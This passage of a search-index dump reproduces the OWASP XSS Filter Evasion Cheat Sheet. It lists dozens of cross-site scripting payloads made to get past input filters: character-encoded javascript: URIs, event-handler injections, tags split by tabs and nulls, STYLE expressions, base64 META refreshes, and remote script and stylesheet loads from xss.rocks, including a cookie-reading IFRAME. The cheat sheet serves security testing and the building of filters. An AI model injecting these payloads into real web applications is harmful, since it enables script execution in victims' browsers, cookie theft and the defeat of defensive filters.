"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-empty","title":"Default SRC Tag by Leaving it Empty","text":"

<IMG SRC= onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-out-entirely","title":"Default SRC Tag by Leaving it out Entirely","text":"

<IMG onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#on-error-alert","title":"On Error Alert","text":"

<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-onerror-and-javascript-alert-encode","title":"IMG onerror and JavaScript Alert Encode","text":"

<img src=x onerror=\"&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references","title":"Decimal HTML Character References","text":"

All of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).

<IMG\u00a0SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references-without-trailing-semicolons","title":"Decimal HTML Character References Without Trailing Semicolons","text":"

This is often effective in XSS that attempts to look for \"&#XX;\", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =\\~ s/.*\\&#(\\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a HTML encoded string (I've seen this in the wild):

<IMG\u00a0SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hexadecimal-html-character-references-without-trailing-semicolons","title":"Hexadecimal HTML Character References Without Trailing Semicolons","text":"

This is also a viable XSS attack against the above string $tmp_string=\\~ s/.*\\&#(\\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-tab","title":"Embedded Tab","text":"

Used to break up the cross site scripting attack:

<IMG SRC=\"jav ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-encoded-tab","title":"Embedded Encoded Tab","text":"

Use this one to break up XSS :

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-newline-to-break-up-xss","title":"Embedded Newline to Break-up XSS","text":"

Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

<IMG\u00a0SRC=\"jav&#x0A;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-carriage-return-to-break-up-xss","title":"Embedded Carriage Return to Break-up XSS","text":"

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG\u00a0SRC=\"jav&#x0D;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#null-breaks-up-javascript-directive","title":"Null breaks up JavaScript Directive","text":"

Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:

perl\u00a0-e\u00a0'print\u00a0\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";'\u00a0>\u00a0out

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#spaces-and-meta-chars-before-the-javascript-in-images-for-xss","title":"Spaces and Meta Chars Before the JavaScript in Images for XSS","text":"

This is useful if the pattern match doesn't take into account spaces in the word javascript: -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the javascript: keyword. The actual reality is you can have any char from 1-32 in decimal:

<IMG SRC=\" &#14; javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#non-alpha-non-digit-xss","title":"Non-alpha-non-digit XSS","text":"

The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \\<SCRIPT\\\\s != \\<SCRIPT/XSS\\\\s:

<SCRIPT/XSS\u00a0SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:

<BODY\u00a0onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#extraneous-open-brackets","title":"Extraneous Open Brackets","text":"

Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#no-closing-script-tags","title":"No Closing Script Tags","text":"

In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \\></SCRIPT> portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:

<SCRIPT\u00a0SRC=http://xss.rocks/xss.js?<\u00a0B\u00a0>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-in-script-tags","title":"Protocol Resolution in Script Tags","text":"

This particular variant was submitted by \u0141ukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The \".j\" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

<SCRIPT\u00a0SRC=//xss.rocks/.j>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#half-open-htmljavascript-xss-vector","title":"Half Open HTML/JavaScript XSS Vector","text":"

Unlike Firefox the IE rendering engine doesn't add extra data to you page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close \">\" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\\\%3D)|(=))\\[^\\\\n\\]\\*((\\\\%3C)|\\<)\\[^\\\\n\\]+((\\\\%3E)|\\>)/ because it doesn't require the end \">\". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

<IMG\u00a0SRC=\"('XSS')\""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#double-open-angle-brackets","title":"Double Open Angle Brackets","text":"

Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<iframe\u00a0src=http://xss.rocks/scriptlet.html\u00a0<

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#escaping-javascript-escapes","title":"Escaping JavaScript Escapes","text":"

When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=\"$ENV{QUERY\\_STRING}\";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a=\"\\\\\\\\\";alert('XSS');//\";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:

\\\";alert('XSS');//

An alternative, if correct JSON or JavaScript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:

</script><script>alert('XSS');</script>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#end-title-tag","title":"End Title Tag","text":"

This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#input-image","title":"INPUT Image","text":"

<INPUT\u00a0TYPE=\"IMAGE\"\u00a0SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-image","title":"BODY Image","text":"

<BODY\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-dynsrc","title":"IMG Dynsrc","text":"

<IMG\u00a0DYNSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-lowsrc","title":"IMG Lowsrc","text":"

<IMG\u00a0LOWSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#list-style-image","title":"List-style-image","text":"

Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<STYLE>li\u00a0{list-style-image:\u00a0url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#vbscript-in-an-image","title":"VBscript in an Image","text":"

<IMG\u00a0SRC='vbscript:msgbox(\"XSS\")'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#livescript-older-versions-of-netscape-only","title":"Livescript (older versions of Netscape only)","text":"

<IMG\u00a0SRC=\"livescript:[code]\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#svg-object-tag","title":"SVG Object Tag","text":"

<svg/onload=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ecmascript-6","title":"ECMAScript 6","text":"
Set.constructor`alert\\x28document.domain\\x29\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-tag","title":"BODY Tag","text":"

Method doesn't require using any variants of javascript: or <SCRIPT... to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (onload= != onload =):

<BODY\u00a0ONLOAD=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#event-handlers","title":"Event Handlers","text":"

It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.

The Dottoro Web Reference also has a nice list of events in JavaScript.

  1. FSCommand() (attacker can use this when executed from within an embedded Flash object)
  2. onAbort() (when user aborts the loading of an image)
  3. onActivate() (when object is set as the active element)
  4. onAfterPrint() (activates after user prints or previews print job)
  5. onAfterUpdate() (activates on data object after updating data in the source object)
  6. onBeforeActivate() (fires before the object is set as the active element)
  7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(\"Copy\") function)
  8. onBeforeCut() (attacker executes the attack string right before a selection is cut)
  9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
  10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
  11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(\"Paste\") function)
  12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(\"Print\") function).
  13. onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
  14. onBeforeUpdate() (activates on data object before updating data in the source object)
  15. onBegin() (the onbegin event fires immediately when the element's timeline begins)
  16. onBlur() (in the case where another popup is loaded and window looses focus)
  17. onBounce() (fires when the behavior property of the marquee object is set to \"alternate\" and the contents of the marquee reach one side of the window)
  18. onCellChange() (fires when data changes in the data provider)
  19. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
  20. onClick() (someone clicks on a form)
  21. onContextMenu() (user would need to right click on attack area)
  22. onControlSelect() (fires when the user is about to make a control selection of the object)
  23. onCopy() (user needs to copy something or it can be exploited using the execCommand(\"Copy\") command)
  24. onCut() (user needs to copy something or it can be exploited using the execCommand(\"Cut\") command)
  25. onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
  26. onDataSetChanged() (fires when the data set exposed by a data source object changes)
  27. onDataSetComplete() (fires to indicate that all data is available from the data source object)
  28. onDblClick() (user double-clicks a form element or a link)
  29. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
  30. onDrag() (requires that the user drags an object)
  31. onDragEnd() (requires that the user drags an object)
  32. onDragLeave() (requires that the user drags an object off a valid location)
  33. onDragEnter() (requires that the user drags an object into a valid location)
  34. onDragOver() (requires that the user drags an object into a valid location)
  35. onDragDrop() (user drops an object (e.g. file) onto the browser window)
  36. onDragStart() (occurs when user starts drag operation)
  37. onDrop() (user drops an object (e.g. file) onto the browser window)
  38. onEnd() (the onEnd event fires when the timeline ends.
  39. onError() (loading of a document or image causes an error)
  40. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
  41. onFilterChange() (fires when a visual filter completes state change)
  42. onFinish() (attacker can create the exploit when marquee is finished looping)
  43. onFocus() (attacker executes the attack string when the window gets focus)
  44. onFocusIn() (attacker executes the attack string when window gets focus)
  45. onFocusOut() (attacker executes the attack string when window looses focus)
  46. onHashChange() (fires when the fragment identifier part of the document's current address changed)
  47. onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
  48. onInput() (the text content of an element is changed through the user interface)
  49. onKeyDown() (user depresses a key)
  50. onKeyPress() (user presses or holds down a key)
  51. onKeyUp() (user releases a key)
  52. onLayoutComplete() (user would have to print or print preview)
  53. onLoad() (attacker executes the attack string after the window loads)
  54. onLoseCapture() (can be exploited by the releaseCapture() method)
  55. onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
  56. onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
  57. onMessage() (fire when the document received a message)
  58. onMouseDown() (the attacker would need to get the user to click on an image)
  59. onMouseEnter() (cursor moves over an object or area)
  60. onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
  61. onMouseMove() (the attacker would need to get the user to mouse over an image or table)
  62. onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
  63. onMouseOver() (cursor moves over an object or area)
  64. onMouseUp() (the attacker would need to get the user to click on an image)
  65. onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
  66. onMove() (user or attacker would move the page)
  67. onMoveEnd() (user or attacker would move the page)
  68. onMoveStart() (user or attacker would move the page)
  69. onOffline() (occurs if the browser is working in online mode and it starts to work offline)
  70. onOnline() (occurs if the browser is working in offline mode and it starts to work online)
  71. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
  72. onPaste() (user would need to paste or attacker could use the execCommand(\"Paste\") function)
  73. onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
  74. onPopState() (fires when user navigated the session history)
  75. onProgress() (attacker would use this as a flash movie was loading)
  76. onPropertyChange() (user or attacker would need to change an element property)
  77. onReadyStateChange() (user or attacker would need to change an element property)
  78. onRedo() (user went forward in undo transaction history)
  79. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
  80. onReset() (user or attacker resets a form)
  81. onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  82. onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  83. onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  84. onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
  85. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
  86. onRowsEnter() (user or attacker would need to change a row in a data source)
  87. onRowExit() (user or attacker would need to change a row in a data source)
  88. onRowDelete() (user or attacker would need to delete a row in a data source)
  89. onRowInserted() (user or attacker would need to insert a row in a data source)
  90. onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
  91. onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
  92. onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  93. onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  94. onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  95. onStart() (fires at the beginning of each marquee loop)
  96. onStop() (user would need to press the stop button or leave the webpage)
  97. onStorage() (storage area changed)
  98. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
  99. onSubmit() (requires attacker or user submits a form)
  100. onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
  101. onTrackChange() (user or attacker changes track in a playList)
  102. onUndo() (user went backward in undo transaction history)
  103. onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
  104. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
  105. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#bgsound","title":"BGSOUND","text":"

<BGSOUND SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-includes","title":"& JavaScript includes","text":"

<BR\u00a0SIZE=\"&{alert('XSS')}\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-sheet","title":"STYLE sheet","text":"

<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet","title":"Remote style sheet","text":"

Using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

<LINK\u00a0REL=\"stylesheet\"\u00a0HREF=\"http://xss.rocks/xss.css\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-2","title":"Remote style sheet part 2","text":"

This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-3","title":"Remote style sheet part 3","text":"

This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

<META\u00a0HTTP-EQUIV=\"Link\"\u00a0Content=\"<http://xss.rocks/xss.css>;\u00a0REL=stylesheet\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-4","title":"Remote style sheet part 4","text":"

This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

<STYLE>BODY{-moz-binding:url(\"http://xss.rocks/xssmoz.xml#xss\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tags-with-broken-up-javascript-for-xss","title":"STYLE Tags with Broken-up JavaScript for XSS","text":"

This XSS at times sends IE into an infinite loop of alerts:

<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-attribute-using-a-comment-to-break-up-expression","title":"STYLE Attribute using a Comment to Break-up Expression","text":"

Created by Roman Ivanov

<IMG\u00a0STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-style-with-expression","title":"IMG STYLE with Expression","text":"

This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:

exp/*<A\u00a0STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-older-versions-of-netscape-only","title":"STYLE Tag (Older versions of Netscape only)","text":"

<STYLE\u00a0TYPE=\"text/javascript\">alert('XSS');</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background-image","title":"STYLE Tag using Background-image","text":"

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A\u00a0CLASS=XSS></A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background","title":"STYLE Tag using Background","text":"

<STYLE\u00a0type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <STYLE type=\"text/css\">BODY{background:url(\"<javascript:alert>('XSS')\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#anonymous-html-with-style-attribute","title":"Anonymous HTML with STYLE Attribute","text":"

IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:

<XSS\u00a0STYLE=\"xss:expression(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#local-htc-file","title":"Local htc File","text":"

This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

<XSS STYLE=\"behavior: url(xss.htc);\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#us-ascii-encoding","title":"US-ASCII Encoding","text":"

US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.

\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta","title":"META","text":"

The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-using-data","title":"META using Data","text":"

Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=data:text/html\u00a0base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-with-additional-url-parameter","title":"META with Additional URL Parameter","text":"

If the target website attempts to see if the URL contains <http://>; at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;\u00a0URL=http://;URL=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe","title":"IFRAME","text":"

If iframes are allowed there are a lot of other XSS problems as well:

<IFRAME\u00a0SRC=\"javascript:alert('XSS');\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe-event-based","title":"IFRAME Event Based","text":"

IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)

<IFRAME\u00a0SRC=#\u00a0onmouseover=\"alert(document.cookie)\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#frame","title":"FRAME","text":"

Frames have the same sorts of XSS problems as iframes

<FRAMESET><FRAME\u00a0SRC=\"javascript:alert('XSS');\"></FRAMESET>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#table","title":"TABLE","text":"

<TABLE\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#td","title":"TD","text":"

Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:

<TABLE><TD\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div","title":"DIV","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image","title":"DIV Background-image","text":"

<DIV\u00a0STYLE=\"background-image:\u00a0url(javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-with-unicoded-xss-exploit","title":"DIV Background-image with Unicoded XSS Exploit","text":"

This has been modified slightly to obfuscate the URL parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV\u00a0STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-plus-extra-characters","title":"DIV Background-image Plus Extra Characters","text":"

Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV\u00a0STYLE=\"background-image:\u00a0url(\u0001javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-expression","title":"DIV Expression","text":"

A variant of this was effective against a real world cross site scripting filter using a newline between the colon and \"expression\":

<DIV\u00a0STYLE=\"width:\u00a0expression(alert('XSS'));\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#downlevel-hidden-block","title":"Downlevel-Hidden Block","text":"

Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<!--[if\u00a0gte\u00a0IE\u00a04]>\n<SCRIPT>alert('XSS');</SCRIPT>\n<![endif]-->\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base-tag","title":"BASE Tag","text":"

Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg rather than full paths. If the path includes a leading forward slash like /images/image.jpg you can remove one slash from this vector (as long as there are two to begin the comment this will work):

<BASE\u00a0HREF=\"javascript:alert('XSS');//\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#object-tag","title":"OBJECT Tag","text":"

